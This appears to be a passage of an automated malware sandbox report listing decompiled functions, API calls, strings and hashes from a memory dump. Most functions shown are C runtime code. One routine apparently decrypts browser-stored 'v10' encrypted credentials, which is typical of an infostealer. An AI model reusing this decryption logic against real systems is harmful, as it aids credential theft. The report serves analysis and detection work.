Instruction Fuzzy Hash: 8B31C8B6A40218BBD718EB50DD46FDAB3BCFB04704F0082AAF616661C0DB756B44CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0041D730, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 144
memoryCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0041D730(void* __ebx, intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				long _v92;
				void* _v96;
				signed int _v100;
				char _v128;
				signed int _v132;
				void* __edi;
				void* __esi;
				signed int _t69;
				signed int _t70;
				void* _t94;
				char* _t129;
				void* _t130;
				intOrPtr _t131;
				void* _t132;
				signed int _t133;
				intOrPtr _t143;

				_t94 = __ebx;
				_push(0xffffffff);
				_push(E0042648B);
				_push( *[fs:0x0]);
				_t69 =  *0x4301f4; // 0x3b2bc12f
				_t70 = _t69 ^ _t133;
				_v100 = _t70;
				_push(_t131);
				_push(_t129);
				_push(_t70);
				 *[fs:0x0] =  &_v16;
				_v132 = 0;
				if(_a12 < 3) {
					L10:
					_t120 = _a12;
					E004011C0(_a4, E0041CD30(_a12, _t129, _t131, 0, _a8, _a12));
					_v132 = _v132 | 0x00000001;
					_t75 = _a4;
					L11:
					 *[fs:0x0] = _v16;
					_pop(_t130);
					_pop(_t132);
					return E00404354(_t75, _t94, _v100 ^ _t133, _t120, _t130, _t132);
				}
				_t129 = "v10";
				_t131 = _a8;
				asm("repe cmpsb");
				if(0 != 0) {
					goto L10;
				} else {
					_t143 = _a20;
					_t120 = 0 | _t143 != 0x00000000;
					if(((0 | _a16 != 0x00000000) & _t143 != 0x00000000) == 0) {
						E004011C0(_a4, "null");
						_v132 = _v132 | 0x00000001;
						_t75 = _a4;
					} else {
						E004091C0( &_v88, 0, 0x40);
						_v88 = 0x40;
						_v84 = 1;
						_v80 = _a8 + 3;
						_v76 = 0xc;
						_v64 = _v80 + _a12 - 0x13;
						_v60 = 0x10;
						_t120 = _a12 - 3 - _v76 - _v60;
						_v92 = _a12 - 3 - _v76 - _v60;
						_v96 = LocalAlloc(0x40, _v92);
						if(_v96 != 0) {
							_t120 = _v92;
							_v20 =  *0x4328cc(_a20, _v80 + _v76, _v92,  &_v88, 0, 0, _v96, _v92,  &_v92, 0);
							if(_v20 < 0) {
								E004011C0(_a4, "null");
								_v132 = _v132 | 0x00000001;
								_t75 = _a4;
							} else {
								E00403F50( &_v128, _v96, _v92);
								_v8 = 0;
								E00401240(_a4,  &_v128);
								_t120 = _v132 | 0x00000001;
								_v132 = _v132 | 0x00000001;
								_v8 = 0xffffffff;
								E004012D0( &_v128);
								_t75 = _a4;
							}
						}
					}
					goto L11;
				}
			}

0x0041d730
0x0041d733
0x0041d735
0x0041d740
0x0041d744
0x0041d749
0x0041d74b
0x0041d74e
0x0041d74f
0x0041d750
0x0041d754
0x0041d75a
0x0041d765
0x0041d8b6
0x0041d8b6
0x0041d8ca
0x0041d8d5
0x0041d8d8
0x0041d8db
0x0041d8de
0x0041d8e6
0x0041d8e7
0x0041d8f5
0x0041d8f5
0x0041d770
0x0041d775
0x0041d77a
0x0041d77c
0x00000000
0x0041d782
0x0041d78d
0x0041d791
0x0041d796
0x0041d8a1
0x0041d8ac
0x0041d8af
0x0041d79c
0x0041d7a4
0x0041d7ac
0x0041d7b3
0x0041d7c0
0x0041d7c3
0x0041d7d4
0x0041d7d7
0x0041d7e7
0x0041d7ea
0x0041d7f9
0x0041d800
0x0041d81c
0x0041d831
0x0041d838
0x0041d884
0x0041d88f
0x0041d892
0x0041d83a
0x0041d845
0x0041d84a
0x0041d858
0x0041d860
0x0041d863
0x0041d866
0x0041d870
0x0041d875
0x0041d875
0x0041d838
0x0041d800
0x00000000
0x0041d796

APIs

_memset.LIBCMT ref: 0041D7A4
LocalAlloc.KERNEL32(00000040,?), ref: 0041D7F3

Strings

null, xrefs: 0041D87C
@, xrefs: 0041D7AC
null, xrefs: 0041D899
v10, xrefs: 0041D770

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocLocal_memset
String ID: @$null$null$v10
API String ID: 52611349-142188288
Opcode ID: 08f85b548037c1a3eff85f49ec059fae9ba0d3ead2541e9c33720b85b54bc36a
Instruction ID: 6db23229f21a6e608e8a6053353fe2398a331c56b1330644fce70f190f6e2a5f
Opcode Fuzzy Hash: 08f85b548037c1a3eff85f49ec059fae9ba0d3ead2541e9c33720b85b54bc36a
Instruction Fuzzy Hash: 8551FCB1E002089FDB08DFD9D895BDEBBB5FF48304F10812AF515AB294DB74A945CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040831E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040831E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t26;
				intOrPtr _t30;
				intOrPtr _t39;
				void* _t40;

				_push(8);
				_push(0x42de30);
				E00408C20(__ebx, __edi, __esi);
				GetModuleHandleW(L"KERNEL32.DLL");
				_t39 =  *((intOrPtr*)(_t40 + 8));
				 *((intOrPtr*)(_t39 + 0x5c)) = 0x4281f0;
				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
				 *((intOrPtr*)(_t39 + 0x14)) = 1;
				 *((intOrPtr*)(_t39 + 0x70)) = 1;
				 *((char*)(_t39 + 0xc8)) = 0x43;
				 *((char*)(_t39 + 0x14b)) = 0x43;
				 *(_t39 + 0x68) = 0x430200;
				E0040B23F(0xd);
				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
				InterlockedIncrement( *(_t39 + 0x68));
				 *(_t40 - 4) = 0xfffffffe;
				E004083C0();
				E0040B23F(0xc);
				 *(_t40 - 4) = 1;
				_t26 =  *((intOrPtr*)(_t40 + 0xc));
				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
				if(_t26 == 0) {
					_t30 =  *0x430968; // 0x430890
					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
				}
				E00407F62( *((intOrPtr*)(_t39 + 0x6c)));
				 *(_t40 - 4) = 0xfffffffe;
				return E00408C65(E004083C9());
			}

0x0040831e
0x00408320
0x00408325
0x0040832f
0x00408335
0x00408338
0x0040833f
0x00408346
0x00408349
0x0040834c
0x00408353
0x0040835a
0x00408363
0x00408369
0x00408370
0x00408376
0x0040837d
0x00408384
0x0040838a
0x0040838d
0x00408390
0x00408395
0x00408397
0x0040839c
0x0040839c
0x004083a2
0x004083a8
0x004083b9

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0042DE30,00000008,00408426,00000000,00000000,?,?,004046A4,00000001,00000000,?,?,?,00404702,?), ref: 0040832F
__lock.LIBCMT ref: 00408363

Part of subcall function 0040B23F: __mtinitlocknum.LIBCMT ref: 0040B255
Part of subcall function 0040B23F: __amsg_exit.LIBCMT ref: 0040B261
Part of subcall function 0040B23F: EnterCriticalSection.KERNEL32(00000000,00000000,?,00408368,0000000D), ref: 0040B269

InterlockedIncrement.KERNEL32(?), ref: 00408370
__lock.LIBCMT ref: 00408384
___addlocaleref.LIBCMT ref: 004083A2

Strings

KERNEL32.DLL, xrefs: 0040832A

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: 8dc3ce37796b9a95288184c909ba6167b2cd58c630a66380ed31e728b2bcc56c
Instruction ID: 06921ac613ad9e7e9797a4722a9f39b8002c478922b7085ed423b9429ee85603
Opcode Fuzzy Hash: 8dc3ce37796b9a95288184c909ba6167b2cd58c630a66380ed31e728b2bcc56c
Instruction Fuzzy Hash: 41018E71905B00DAE720AF66D909709FBE0AF50724F20895FE4D5A62E1CFB8A544CB1D

Uniqueness

Uniqueness Score: -1.00%

Function 00425742, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00425742(void* __ebx, void* __edx, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				void* __ebp;
				void* _t16;
				intOrPtr* _t19;
				void* _t25;

				_t26 = __esi;
				_t24 = __edx;
				_t23 = __ebx;
				_t31 =  *((intOrPtr*)( *_a4)) - 0xe0434352;
				if( *((intOrPtr*)( *_a4)) == 0xe0434352) {
					L8:
					__eflags =  *((intOrPtr*)(E0040844B(_t24, _t25, __eflags) + 0x90));
					if(__eflags > 0) {
						_t16 = E0040844B(_t24, _t25, __eflags);
						_t9 = _t16 + 0x90;
						 *_t9 =  *((intOrPtr*)(_t16 + 0x90)) - 1;
						__eflags =  *_t9;
					}
					goto L10;
				} else {
					__eflags = __eax - 0xe0434f4d;
					if(__eflags == 0) {
						goto L8;
					} else {
						__eflags = __eax - 0xe06d7363;
						if(__eflags != 0) {
							L10:
							__eflags = 0;
							return 0;
						} else {
							 *(E0040844B(__edx, __edi, __eflags) + 0x90) =  *(__eax + 0x90) & 0x00000000;
							_push(8);
							_push(0x42dfe8);
							E00408C20(__ebx, _t25, __esi);
							_t19 =  *((intOrPtr*)(E0040844B(__edx, _t25, _t31) + 0x78));
							if(_t19 != 0) {
								_v8 = _v8 & 0x00000000;
								 *_t19();
								_v8 = 0xfffffffe;
							}
							return E00408C65(E004125F1(_t23, _t24, _t25, _t26));
						}
					}
				}
			}

0x00425742
0x00425742
0x00425742
0x0042574e
0x00425753
0x00425774
0x00425779
0x00425780
0x00425782
0x00425787
0x00425787
0x00425787
0x00425787
0x00000000
0x00425755
0x00425755
0x0042575a
0x00000000
0x0042575c
0x0042575c
0x00425761
0x0042578d
0x0042578d
0x00425790
0x00425763
0x00425768
0x0040f63d
0x0040f63f
0x0040f644
0x0040f64e
0x0040f653
0x0040f655
0x0040f659
0x0040f664
0x0040f664
0x0040f675
0x0040f675
0x00425761
0x0042575a

APIs

__getptd.LIBCMT ref: 00425763

Part of subcall function 0040844B: __getptd_noexit.LIBCMT ref: 0040844E
Part of subcall function 0040844B: __amsg_exit.LIBCMT ref: 0040845B

__getptd.LIBCMT ref: 00425774
__getptd.LIBCMT ref: 00425782

Strings

RCC, xrefs: 0042574E
csm, xrefs: 0042575C
MOC, xrefs: 00425755

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 36e216435a19a69b5e7bcfee0304e1495cac26ab6edcfc8f9ed2c1b4ad4e0b23
Instruction ID: a53cf0b58843d3a613f91901a7b789298cb95d75ea8bfa8c68308931ec6748e6
Opcode Fuzzy Hash: 36e216435a19a69b5e7bcfee0304e1495cac26ab6edcfc8f9ed2c1b4ad4e0b23
Instruction Fuzzy Hash: 86E01230644514CEC720DBA9D14A7A936E5FF84318F5515F7E44CCB362DB3CD851598B

Uniqueness

Uniqueness Score: -1.00%

Function 004259F4, Relevance: 9.0, APIs: 6, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E004259F4(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t48;
				void* _t53;
				intOrPtr _t57;
				void* _t58;
				void* _t61;

				_t61 = __eflags;
				_push(0x2c);
				_push(0x42e7c8);
				E00408C20(__ebx, __edi, __esi);
				_t48 = __ecx;
				_t55 =  *((intOrPtr*)(_t58 + 0xc));
				_t57 =  *((intOrPtr*)(_t58 + 8));
				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
				 *((intOrPtr*)(_t58 - 0x28)) = E00425587(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E0040844B(_t53, _t55, _t61) + 0x88));
				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E0040844B(_t53, _t55, _t61) + 0x8c));
				 *((intOrPtr*)(E0040844B(_t53, _t55, _t61) + 0x88)) = _t57;
				 *((intOrPtr*)(E0040844B(_t53, _t55, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *((intOrPtr*)(_t58 + 0x10)) = 1;
				 *(_t58 - 4) = 1;
				 *((intOrPtr*)(_t58 - 0x1c)) = E0042562C(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
				 *(_t58 - 4) = 0xfffffffe;
				 *((intOrPtr*)(_t58 + 0x10)) = 0;
				E00425B1A(_t48, _t53, _t55, _t57, _t61);
				return E00408C65( *((intOrPtr*)(_t58 - 0x1c)));
			}

0x004259f4
0x004259f4
0x004259f6
0x004259fb
0x00425a00
0x00425a02
0x00425a05
0x00425a08
0x00425a0b
0x00425a12
0x00425a23
0x00425a31
0x00425a3f
0x00425a47
0x00425a55
0x00425a5b
0x00425a62
0x00425a65
0x00425a7b
0x00425a7e
0x00425af3
0x00425afa
0x00425b01
0x00425b0e

APIs

__CreateFrameInfo.LIBCMT ref: 00425A1C

Part of subcall function 00425587: __getptd.LIBCMT ref: 00425595
Part of subcall function 00425587: __getptd.LIBCMT ref: 004255A3

__getptd.LIBCMT ref: 00425A26

Part of subcall function 0040844B: __getptd_noexit.LIBCMT ref: 0040844E
Part of subcall function 0040844B: __amsg_exit.LIBCMT ref: 0040845B

__getptd.LIBCMT ref: 00425A34
__getptd.LIBCMT ref: 00425A42
__getptd.LIBCMT ref: 00425A4D
_CallCatchBlock2.LIBCMT ref: 00425A73

Part of subcall function 0042562C: __CallSettingFrame@12.LIBCMT ref: 00425678

Part of subcall function 00425B1A: __getptd.LIBCMT ref: 00425B29
Part of subcall function 00425B1A: __getptd.LIBCMT ref: 00425B37

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: b524b819e114a7a0f536bcce9b494da9e256328cc1a4bff23359c6763e2fe9eb
Instruction ID: 3bc6e67a87ea4963972b6cd327c8599b414d9d2cb2c0c0bc411de041e5890d68
Opcode Fuzzy Hash: b524b819e114a7a0f536bcce9b494da9e256328cc1a4bff23359c6763e2fe9eb
Instruction Fuzzy Hash: 5F1119B1D00609EFDB00EFA5D586BAD7BB0FF04318F50806EF854A7291DB789A119F55

Uniqueness

Uniqueness Score: -1.00%

Function 00407AA1, Relevance: 9.0, APIs: 6, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00407AA1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x42ddd0);
				E00408C20(__ebx, __edi, __esi);
				_t31 = E0040844B(__edx, __edi, _t35);
				_t15 =  *0x430720; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E0040B23F(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x430628; // 0xc11620
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x430200;
								if(__eflags != 0) {
									E00405341(_t33);
								}
							}
						}
						_t21 =  *0x430628; // 0xc11620
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x430628; // 0xc11620
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E00407B3C();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E00408BF8(_t25, _t29, _t31, _t33, _t38, 0x20);
				}
				return E00408C65(_t33);
			}

0x00407aa1
0x00407aa1
0x00407aa1
0x00407aa1
0x00407aa3
0x00407aa8
0x00407ab2
0x00407ab4
0x00407abc
0x00407add
0x00407ae3
0x00407ae7
0x00407aea
0x00407aed
0x00407af3
0x00407af5
0x00407af7
0x00407b00
0x00407b02
0x00407b04
0x00407b0a
0x00407b0d
0x00407b12
0x00407b0a
0x00407b02
0x00407b13
0x00407b18
0x00407b1b
0x00407b21
0x00407b25
0x00407b25
0x00407b2b
0x00407b32
0x00407ac4
0x00407ac4
0x00407ac4
0x00407ac7
0x00407ac9
0x00407acd
0x00407ad2
0x00407ada

APIs

__getptd.LIBCMT ref: 00407AAD

Part of subcall function 0040844B: __getptd_noexit.LIBCMT ref: 0040844E
Part of subcall function 0040844B: __amsg_exit.LIBCMT ref: 0040845B

__amsg_exit.LIBCMT ref: 00407ACD
__lock.LIBCMT ref: 00407ADD
InterlockedDecrement.KERNEL32(?), ref: 00407AFA
_free.LIBCMT ref: 00407B0D
InterlockedIncrement.KERNEL32(00C11620), ref: 00407B25

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 3f8be9e51290dcc651e7121cd800779f8bce3a9782d89db55d4154487ca158d0
Instruction ID: 49243f148acfb267e9107d8de470b05406bbb721a83e860cd0129b663bff1516
Opcode Fuzzy Hash: 3f8be9e51290dcc651e7121cd800779f8bce3a9782d89db55d4154487ca158d0
Instruction Fuzzy Hash: 68018E31E06A119BDA20AB65984675E77A0AB44724F14413BE800B32C1CB3C7942CFEE

Uniqueness

Uniqueness Score: -1.00%

Function 0041F7B0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041F7B0(void* __edx, void* __edi, void* __esi, WCHAR* _a4) {
				LPWSTR* _v8;
				LPWSTR* _v12;
				long _v16;
				WCHAR* _v20;
				signed int _v24;
				LPWSTR* _t63;
				WCHAR* _t69;
				void* _t79;
				void* _t108;
				void* _t110;

				_v8 = 0;
				if(_a4 == 0 || ( *_a4 & 0x0000ffff) == 0) {
					E0041F590(2);
					return 0;
				} else {
					_t63 = E0040537B(__edx, __edi, __esi, 0x47c);
					_t110 = _t108 + 4;
					_v8 = _t63;
					if(_v8 == 0) {
						_v12 = 1;
					} else {
						_v8[0x11d] = 0xffffffff;
						_v8[0x11e] = 0;
						_v8[0x11c] = 0;
						_v16 = GetFullPathNameW(_a4, 0, 0, 0);
						_t69 = E0040537B(_a4, __edi, __esi, _v16 + _v16 + 0x10);
						_t110 = _t110 + 4;
						_v8[0x11e] = _t69;
						if(_v8[0x11e] == 0) {
							_v12 = 1;
						} else {
							_v16 = GetFullPathNameW(_a4, _v16, _v8[0x11e], 0);
							if(_v16 <= 0) {
								E0041F590(2);
								_t110 = _t110 + 4;
								_v12 = 1;
							} else {
								_v20 =  &(_v8[0x11e][_v16]);
								if(_v8[0x11e] < _v20) {
									_v24 =  *(_v20 - 2) & 0x0000ffff;
									if(_v24 != 0x2f && _v24 != 0x3a && _v24 != 0x5c) {
										 *_v20 = 0x5c;
										_v20 =  &(_v20[1]);
									}
								}
								 *_v20 = 0x2a;
								_v20 =  &(_v20[1]);
								 *_v20 = 0;
								_t79 = E0041F6B0(0, _v8);
								_t110 = _t110 + 4;
								if(_t79 == 0) {
									_v12 = 1;
									E0041F590(2);
									_t110 = _t110 + 4;
								} else {
									_v12 = 0;
								}
							}
						}
					}
					if(_v12 != 0 && _v8 != 0) {
						E0041F720(_v8, _v8);
						_v8 = 0;
					}
					return _v8;
				}
			}

0x0041f7b6
0x0041f7c1
0x0041f7cf
0x00000000
0x0041f7de
0x0041f7e3
0x0041f7e8
0x0041f7eb
0x0041f7f2
0x0041f93a
0x0041f7f8
0x0041f7fb
0x0041f808
0x0041f815
0x0041f82f
0x0041f83a
0x0041f83f
0x0041f845
0x0041f855
0x0041f931
0x0041f85b
0x0041f875
0x0041f87c
0x0041f920
0x0041f925
0x0041f928
0x0041f882
0x0041f891
0x0041f8a0
0x0041f8a9
0x0041f8b0
0x0041f8ca
0x0041f8d3
0x0041f8d3
0x0041f8b0
0x0041f8de
0x0041f8e7
0x0041f8ef
0x0041f8f6
0x0041f8fb
0x0041f900
0x0041f90b
0x0041f914
0x0041f919
0x0041f902
0x0041f902
0x0041f902
0x0041f91c
0x0041f92f
0x0041f938
0x0041f945
0x0041f951
0x0041f959
0x0041f959
0x00000000
0x0041f960

APIs

_malloc.LIBCMT ref: 0041F7E3
GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041F829
_malloc.LIBCMT ref: 0041F83A
GetFullPathNameW.KERNEL32(00000000,?,?,00000000), ref: 0041F86F

Strings

\, xrefs: 0041F8B8

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FullNamePath_malloc
String ID: \
API String ID: 3141036907-2967466578
Opcode ID: 591764a51ae57c1d639d9e101fbe53a5a95207a2bd42d8ba35574e4cf491d787
Instruction ID: 8a36608226c34a9c5f29b167a6d21b1c2e9ee0c8d078a1cfab391da1692c6373
Opcode Fuzzy Hash: 591764a51ae57c1d639d9e101fbe53a5a95207a2bd42d8ba35574e4cf491d787
Instruction Fuzzy Hash: 2C5173B0D04208EBDB14DFA4C545BEEB7B0FF04304F2445BAD519AB391E7789A8ACB55

Uniqueness

Uniqueness Score: -1.00%

Function 0041290D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041290D(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				void* __ebx;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				int _t58;
				char _t59;
				short* _t60;
				int _t65;
				char* _t73;

				_t73 = _a8;
				if(_t73 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t73 != 0) {
						E00404BBD(0,  &_v20, __edi, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E0040AEAB( *_t73 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								_t40 = _v20 + 4; // 0x3674fff8
								__eflags = MultiByteToWideChar( *_t40, 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E00405A49(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t15 = _t56 + 0xac; // 0xd00c7
							_t65 =  *_t15;
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								_t24 = _t56 + 0xac; // 0xd00c7
								__eflags = _a12 -  *_t24;
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t73[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t26 = _t56 + 0xac; // 0xd00c7
								_t57 =  *_t26;
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t21 = _t56 + 4; // 0x3674fff8
							_t58 = MultiByteToWideChar( *_t21, 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t73 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x00412917
0x0041291e
0x00412935
0x00000000
0x00412925
0x00412927
0x00412941
0x00412946
0x00412949
0x0041294c
0x00412974
0x0041297b
0x0041297d
0x004129fe
0x00412a10
0x00412a19
0x00412a1b
0x0041295b
0x0041295b
0x0041295e
0x00412960
0x00412963
0x00412963
0x00412963
0x00412963
0x00000000
0x00412969
0x004129dd
0x004129dd
0x004129e2
0x004129e8
0x004129eb
0x004129ed
0x004129f0
0x004129f0
0x004129f0
0x004129f0
0x00000000
0x004129f4
0x0041297f
0x00412982
0x00412982
0x00412988
0x0041298b
0x004129b2
0x004129b5
0x004129b5
0x004129bb
0x00000000
0x00000000
0x004129bd
0x004129c0
0x00000000
0x00000000
0x004129c2
0x004129c2
0x004129c2
0x004129c8
0x004129cb
0x0041293a
0x0041293a
0x004129d4
0x00000000
0x004129d4
0x0041298d
0x00412990
0x00000000
0x00000000
0x00412994
0x004129a2
0x004129a5
0x004129ab
0x004129ad
0x004129b0
0x00000000
0x00000000
0x00000000
0x004129b0
0x0041294e
0x00412951
0x00412953
0x00412958
0x00412958
0x00000000
0x00412929
0x00412929
0x0041292e
0x00412932
0x00412932
0x00000000
0x0041292e
0x00412927

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00412941
__isleadbyte_l.LIBCMT ref: 00412974
MultiByteToWideChar.KERNEL32(3674FFF8,00000009,00000000,000D00C7,?,00000000,?,?,?,004126EF,00000000,?,00000109), ref: 004129A5
MultiByteToWideChar.KERNEL32(3674FFF8,00000009,00000000,00000001,?,00000000,?,?,?,004126EF,00000000,?,00000109), ref: 00412A13

Strings

&A, xrefs: 0041290F

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID: &A
API String ID: 3058430110-640968382
Opcode ID: c738faceb6e384830f32b140d7b6c523100dc1762c863c49405c3af07824673d
Instruction ID: 748d39fc02a1482a1694b034eaf44fbe9bd7851bf869aa2a1f084360d49be2e6
Opcode Fuzzy Hash: c738faceb6e384830f32b140d7b6c523100dc1762c863c49405c3af07824673d
Instruction Fuzzy Hash: 9031A3B1B10245EFCB20CF68CA809FF3BA4AF05310F14456AE4A5DB2A1D374D9E1DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00425DA1, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E00425DA1(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E00425D0F(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E004252E1(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00425791(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_t14 = _t22 + 0xc; // 0x6e
				_push(_t27);
				_push(_a4);
				_t20 = E004259F4(_t22,  *_t14, _t26, _t27, _t31);
				if(_t20 != 0) {
					E004252A8(_t20, _t27);
					return _t20;
				}
				return _t20;
			}

0x00425da1
0x00425da1
0x00425da1
0x00425da1
0x00425da6
0x00425daa
0x00425dac
0x00425daf
0x00425db0
0x00425db1
0x00425db4
0x00425db9
0x00425db9
0x00425dbc
0x00425dc0
0x00425dc3
0x00425dc8
0x00425dc5
0x00425dc5
0x00425dc5
0x00425dcb
0x00425dd0
0x00425dd2
0x00425dd5
0x00425dd8
0x00425dd9
0x00425de1
0x00425de6
0x00425dea
0x00425ded
